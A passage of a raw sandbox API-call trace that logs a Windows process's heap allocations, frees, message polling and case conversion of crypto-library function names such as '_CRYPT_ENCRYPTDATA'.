[0082.558] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0082.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0082.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0082.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2b30 [0082.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0082.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0082.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5570) returned 0x43fd3b8 [0082.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2ca0 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2d10 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0082.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2c50 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0082.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb420 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5570) returned 0x49aa010 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0082.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0082.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d20 [0082.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0082.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0082.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0082.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0082.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0082.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0082.560] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0082.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0082.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0082.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ace80 [0082.560] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0082.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0082.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0082.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0082.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0082.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0082.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0082.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0082.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0082.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0082.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0082.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0082.560] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0082.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0082.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0082.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0082.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2b50 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb3c0 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35d8 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0082.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3860 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0082.561] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35f0 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c80 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3590 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d02d8 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3878 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0082.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3608 [0082.561] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0082.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0082.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3638 [0082.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0082.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36c8 [0082.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0082.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0082.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0082.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0082.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0082.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0082.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0082.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0082.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0082.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0082.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0082.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0082.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d02d8 | out: hHeap=0x1780000) returned 1 [0082.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.562] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0082.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d03f0 [0082.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3788 [0082.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0082.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0082.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0082.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0710 [0082.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0082.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0082.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0082.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0082.566] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0082.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3740 [0082.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0082.566] PeekMessageW (in: lpMsg=0x144d8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144d8e4) returned 0 [0082.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2f20 [0082.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2f20 | out: hHeap=0x1780000) returned 1 [0082.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0082.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0082.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0082.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0082.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37a0 [0082.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0082.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0082.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 [0082.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0082.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3848 [0082.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0082.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36e0 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3800 [0082.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0082.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35c0 [0082.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0082.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0710 | out: hHeap=0x1780000) returned 1 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35d8 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36c8 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c40 [0082.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3818 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3668 [0082.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3830 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0738 [0082.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0082.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2da0 [0082.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0082.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0082.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0082.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2e90 [0082.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2da0 | out: hHeap=0x1780000) returned 1 [0082.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0082.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e90 | out: hHeap=0x1780000) returned 1 [0082.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0082.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0082.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0738 | out: hHeap=0x1780000) returned 1 [0082.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3878 [0082.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0082.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3608 [0082.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0082.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0082.568] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3710 [0082.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2f00 [0082.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d60 [0082.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0082.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2f00 | out: hHeap=0x1780000) returned 1 [0082.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d60 | out: hHeap=0x1780000) returned 1 [0082.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0418 [0082.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2e80 [0082.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0082.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ee0 [0082.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2e70 [0082.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0082.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ee0 | out: hHeap=0x1780000) returned 1 [0082.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e70 | out: hHeap=0x1780000) returned 1 [0082.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d30 [0082.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0082.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2e70 [0082.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ea0 [0082.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3710 [0082.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e70 | out: hHeap=0x1780000) returned 1 [0082.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ea0 | out: hHeap=0x1780000) returned 1 [0082.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2da0 [0082.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0082.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2df0 [0082.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d40 [0082.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0082.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2df0 | out: hHeap=0x1780000) returned 1 [0082.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d40 | out: hHeap=0x1780000) returned 1 [0082.570] RtlAllocateHeap (HeapHandle=0x1780000, 